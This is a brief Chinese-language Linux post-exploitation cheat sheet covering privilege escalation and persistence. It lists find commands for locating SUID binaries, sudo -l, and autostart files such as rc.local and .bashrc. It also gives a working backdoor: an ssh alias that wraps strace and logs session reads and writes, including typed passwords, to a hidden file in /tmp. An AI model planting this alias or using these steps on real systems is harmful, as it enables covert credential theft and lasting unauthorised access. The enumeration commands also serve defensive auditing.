持久化

权限提升

• 内核漏洞利用

• 攻击有root权限的服务

• 利用第三方服务提权

• 通过有SUID属性的可执行文件

  • 查找可能提权的可执行文件：

  • find / -perm +4000 -ls

  • find / -perm -u=s -type f 2>/dev/null

  • find / -user root -perm -4000 -print 2>/dev/null

  • find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

• 利用可用的root权限

  • sudo -l

自启动

• /etc/init.d

• /etc/rc.d/rc.local

• ~/.bashrc

• ~/.zshrc

后门

• ssh 后门

  • alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'